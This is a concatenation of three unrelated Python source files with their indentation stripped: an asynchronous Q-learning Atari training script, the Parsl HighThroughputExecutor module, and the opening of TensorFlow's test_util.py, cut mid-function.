probabilities = np.array([0.4,0.3,0.3])
return np.random.choice(final_epsilons, 1, p=list(probabilities))[0]
def actor_learner_thread(thread_id, env, session, graph_ops, num_actions, summary_ops, saver):
"""
Actor-learner thread implementing asynchronous one-step Q-learning, as specified
in algorithm 1 here: http://arxiv.org/pdf/1602.01783v1.pdf.
"""
global TMAX, T
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
st = graph_ops["st"]
target_q_values = graph_ops["target_q_values"]
reset_target_network_params = graph_ops["reset_target_network_params"]
a = graph_ops["a"]
y = graph_ops["y"]
grad_update = graph_ops["grad_update"]
summary_placeholders, update_ops, summary_op = summary_ops
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
# Initialize network gradients
s_batch = []
a_batch = []
y_batch = []
final_epsilon = sample_final_epsilon()
initial_epsilon = 1.0
epsilon = 1.0
print "Starting thread ", thread_id, "with final epsilon ", final_epsilon
time.sleep(3*thread_id)
t = 0
while T < TMAX:
# Get initial game observation
s_t = env.get_initial_state()
terminal = False
# Set up per-episode counters
ep_reward = 0
episode_ave_max_q = 0
ep_t = 0
while True:
# Forward the deep q network, get Q(s,a) values
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
# Choose next action based on e-greedy policy
a_t = np.zeros([num_actions])
action_index = 0
if random.random() <= epsilon:
action_index = random.randrange(num_actions)
else:
action_index = np.argmax(readout_t)
a_t[action_index] = 1
# Scale down epsilon
if epsilon > final_epsilon:
epsilon -= (initial_epsilon - final_epsilon) / FLAGS.anneal_epsilon_timesteps
# Gym excecutes action in game environment on behalf of actor-learner
s_t1, r_t, terminal, info = env.step(action_index)
# Accumulate gradients
readout_j1 = target_q_values.eval(session = session, feed_dict = {st : [s_t1]})
clipped_r_t = np.clip(r_t, -1, 1)
if terminal:
y_batch.append(clipped_r_t)
else:
y_batch.append(clipped_r_t + FLAGS.gamma * np.max(readout_j1))
a_batch.append(a_t)
s_batch.append(s_t)
# Update the state and counters
s_t = s_t1
T += 1
t += 1
ep_t += 1
ep_reward += r_t
episode_ave_max_q += np.max(readout_t)
# Optionally update target network
if T % FLAGS.target_network_update_frequency == 0:
session.run(reset_target_network_params)
# Optionally update online network
if t % FLAGS.network_update_frequency == 0 or terminal:
if s_batch:
session.run(grad_update, feed_dict = {y : y_batch,
a : a_batch,
s : s_batch})
# Clear gradients
s_batch = []
a_batch = []
y_batch = []
# Save model progress
if t % FLAGS.checkpoint_interval == 0:
saver.save(session, FLAGS.checkpoint_dir+"/"+FLAGS.experiment+".ckpt", global_step = t)
# Print end of episode stats
if terminal:
stats = [ep_reward, episode_ave_max_q/float(ep_t), epsilon]
for i in range(len(stats)):
session.run(update_ops[i], feed_dict={summary_placeholders[i]:float(stats[i])})
print "THREAD:", thread_id, "/ TIME", T, "/ TIMESTEP", t, "/ EPSILON", epsilon, "/ REWARD", ep_reward, "/ Q_MAX %.4f" % (episode_ave_max_q/float(ep_t)), "/ EPSILON PROGRESS", t/float(FLAGS.anneal_epsilon_timesteps)
break
def build_graph(num_actions):
# Create shared deep q network
s, q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
network_params = q_network.trainable_weights
q_values = q_network(s)
# Create shared target network
st, target_q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
target_network_params = target_q_network.trainable_weights
target_q_values = target_q_network(st)
# Op for periodically updating target network with online network weights
reset_target_network_params = [target_network_params[i].assign(network_params[i]) for i in range(len(target_network_params))]
# Define cost and gradient update op
a = tf.placeholder("float", [None, num_actions])
y = tf.placeholder("float", [None])
action_q_values = tf.reduce_sum(tf.mul(q_values, a), reduction_indices=1)
cost = tf.reduce_mean(tf.square(y - action_q_values))
optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)
grad_update = optimizer.minimize(cost, var_list=network_params)
graph_ops = {"s" : s,
"q_values" : q_values,
"st" : st,
"target_q_values" : target_q_values,
"reset_target_network_params" : reset_target_network_params,
"a" : a,
"y" : y,
"grad_update" : grad_update}
return graph_ops
# Set up some episode summary ops to visualize on tensorboard.
def setup_summaries():
episode_reward = tf.Variable(0.)
tf.scalar_summary("Episode Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.scalar_summary("Max Q Value", episode_ave_max_q)
logged_epsilon = tf.Variable(0.)
tf.scalar_summary("Epsilon", logged_epsilon)
logged_T = tf.Variable(0.)
summary_vars = [episode_reward, episode_ave_max_q, logged_epsilon]
summary_placeholders = [tf.placeholder("float") for i in range(len(summary_vars))]
update_ops = [summary_vars[i].assign(summary_placeholders[i]) for i in range(len(summary_vars))]
summary_op = tf.merge_all_summaries()
return summary_placeholders, update_ops, summary_op
def get_num_actions():
"""
Returns the number of possible actions for the given atari game
"""
# Figure out number of actions from gym env
env = gym.make(FLAGS.game)
num_actions = env.action_space.n
if (FLAGS.game == "Pong-v0" or FLAGS.game == "Breakout-v0"):
# Gym currently specifies 6 actions for pong
# and breakout when only 3 are needed. This
# is a lame workaround.
num_actions = 3
return num_actions
def train(session, graph_ops, num_actions, saver):
# Initialize target network weights
session.run(graph_ops["reset_target_network_params"])
# Set up game environments (one per thread)
envs = [gym.make(FLAGS.game) for i in range(FLAGS.num_concurrent)]
summary_ops = setup_summaries()
summary_op = summary_ops[-1]
# Initialize variables
session.run(tf.initialize_all_variables())
summary_save_path = FLAGS.summary_dir + "/" + FLAGS.experiment
writer = tf.train.SummaryWriter(summary_save_path, session.graph)
if not os.path.exists(FLAGS.checkpoint_dir):
os.makedirs(FLAGS.checkpoint_dir)
# Start num_concurrent actor-learner training threads
actor_learner_threads = [threading.Thread(target=actor_learner_thread, args=(thread_id, envs[thread_id], session, graph_ops, num_actions, summary_ops, saver)) for thread_id in range(FLAGS.num_concurrent)]
for t in actor_learner_threads:
t.start()
# Show the agents training and write summary statistics
last_summary_time = 0
while True:
if FLAGS.show_training:
for env in envs:
env.render()
now = time.time()
if now - last_summary_time > FLAGS.summary_interval:
summary_str = session.run(summary_op)
writer.add_summary(summary_str, float(T))
last_summary_time = now
for t in actor_learner_threads:
t.join()
def evaluation(session, graph_ops, saver):
saver.restore(session, FLAGS.checkpoint_path)
print "Restored model weights from ", FLAGS.checkpoint_path
monitor_env = gym.make(FLAGS.game)
monitor_env.monitor.start(FLAGS.eval_dir+"/"+FLAGS.experiment+"/eval")
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=monitor_env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
for i_episode in xrange(FLAGS.num_eval_episodes):
s_t = env.get_initial_state()
ep_reward = 0
terminal = False
while not terminal:
monitor_env.render()
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
action_index = np.argmax(readout_t)
s_t1, r_t, terminal, info = env.step(action_index)
s_t = s_t1
ep_reward += r_t
print ep_reward
monitor_env.monitor.close()
def main(_):
g = tf.Graph()
with g.as_default(), tf.Session() as session:
K.set_session(session)
num_actions = get_num_actions()
graph_ops = build_graph(num_actions)
saver = tf.train.Saver()
if FLAGS.testing:
evaluation(session, graph_ops, saver)
else:
train(session, graph_ops, num_actions, saver)
if __name__ == "__main__":
tf.app.run()
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import datetime
import pickle
from multiprocessing import Queue
from typing import Dict # noqa F401 (used in type annotation)
from typing import List, Optional, Tuple, Union
import math
from parsl.serialize import pack_apply_message, deserialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import (
BadMessage, ScalingFailed,
DeserializationError, SerializationError,
UnsupportedFeatureError
)
from parsl.executors.status_handling import BlockProviderExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.process_loggers import wrap_with_logs
from parsl.multiprocessing import ForkProcess
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class HighThroughputExecutor(BlockProviderExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
and is an integer in the range from 0 to the number of workers per in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by ``hostname`` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
the there's sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched per node. Default: infinity
cpu_affinity: string
Whether or how each worker process sets thread affinity. Options are "none" to forgo
any CPU affinity configuration, "block" to assign adjacent cores to workers
(ex: assign 0-1 to worker 0, 2-3 to worker 1), and
"alternating" to assign cores to workers in round-robin
(ex: assign 0,2 to worker 0, 1,3 to worker 1).
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
address_probe_timeout : int | None
Managers attempt connecting over many different addesses to determine a viable address.
This option sets a time limit in seconds on the connection attempt.
Default of None implies 30s timeout set on worker.
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
cpu_affinity: str = 'none',
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
address_probe_timeout: Optional[int] = None,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
BlockProviderExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
self.address_probe_timeout = address_probe_timeout
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self._workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self._workers_per_node == float('inf'):
self._workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.run_id = None # set to the correct run_id in dfk
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
self.cpu_affinity = cpu_affinity
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"{address_probe_timeout_string} "
"--hb_threshold={heartbeat_threshold} "
"--cpu-affinity {cpu_affinity} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
address_probe_timeout_string = ""
if self.address_probe_timeout:
address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
address_probe_timeout_string=address_probe_timeout_string,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir,
cpu_affinity=self.cpu_affinity)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
# TODO: why is this a provider property?
block_ids = []
if hasattr(self.provider, 'init_blocks'):
try:
block_ids = self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
return block_ids
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
block_ids = self.initialize_scaling()
return block_ids
@wrap_with_logs
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
try:
msgs = self.incoming_q.get(timeout=1)
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
exception = deserialize(msg['exception'])
self.set_bad_state_and_fail_all(exception)
break
elif tid == -1 and 'heartbeat' in msg:
continue
task_fut = self.tasks.pop(tid)
if 'result' in msg:
result = deserialize(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s = deserialize(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = ForkProcess(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to manager: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, resource_specification, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- args (list) : List of arbitrary positional arguments.
Kwargs:
- kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in HighThroughput Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
fut = Future()
self.tasks[task_id] = fut
try:
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024)
except TypeError:
raise SerializationError(func.__name__)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return fut
@property
def scaling_enabled(self):
return self._scaling_enabled
def create_monitoring_info(self, status):
""" Create a msg for monitoring based on the poll status
"""
msg = []
for bid, s in status.items():
d = {}
d['run_id'] = self.run_id
d['status'] = s.status_name
d['timestamp'] = datetime.datetime.now()
d['executor_label'] = self.label
d['job_id'] = self.blocks.get(bid, None)
d['block_id'] = bid
msg.append(d)
return msg
@property
def workers_per_node(self) -> Union[int, float]:
return self._workers_per_node
def scale_in(self, blocks=None, block_ids=[], force=True, max_idletime=None):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
force : Bool
Used along with blocks to indicate whether blocks should be terminated by force.
When force = True, we will kill blocks regardless of the blocks being busy
When force = False, Only idle blocks will be terminated.
If the # of ``idle_blocks`` < ``blocks``, the list of jobs marked for termination
will be in the range: 0 - ``blocks``.
max_idletime: float
A time to indicate how long a block can be idle.
Used along with force = False to kill blocks that have been idle for that long.
block_ids : list
List of specific block ids to terminate. Optional
Returns
-------
List of job_ids marked for termination
"""
if block_ids:
block_ids_to_kill = block_ids
else:
managers = self.connected_managers
block_info = {}
for manager in managers:
if not manager['active']:
continue
b_id = manager['block_id']
if b_id not in block_info:
block_info[b_id] = [0, float('inf')]
block_info[b_id][0] += manager['tasks']
block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
sorted_blocks = sorted(block_info.items(), key=lambda item: (item[1][1], item[1][0]))
if force is True:
block_ids_to_kill = [x[0] for x in sorted_blocks[:blocks]]
else:
if not max_idletime:
block_ids_to_kill = [x[0] for x in sorted_blocks if x[1][0] == 0][:blocks]
else:
block_ids_to_kill = []
for x in sorted_blocks:
if x[1][1] > max_idletime and x[1][0] == 0:
block_ids_to_kill.append(x[0])
if len(block_ids_to_kill) == blocks:
break
logger.debug("Selecting block ids to kill since they are idle : {}".format(
block_ids_to_kill))
logger.debug("Current blocks : {}".format(self.blocks))
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
# Potential issue with multiple threads trying to remove the same blocks
to_kill = [self.blocks[bid] for bid in block_ids_to_kill if bid in self.blocks]
r = self.provider.cancel(to_kill)
job_ids = self._filter_scale_in_ids(to_kill, r)
# to_kill block_ids are fetched from self.blocks
# If a block_id is in self.block, it must exist in self.block_mapping
block_ids_killed = [self.block_mapping[jid] for jid in job_ids]
return block_ids_killed
def _get_launch_command(self, block_id: str) -> str:
if self.launch_cmd is None:
raise ScalingFailed(self, "No launch command")
launch_cmd = self.launch_cmd.format(block_id=block_id)
return launch_cmd
def shutdown(self):
"""Shutdown the executor, including all workers and controllers.
"""
logger.info("Attempting HighThroughputExecutor shutdown")
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import memory
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
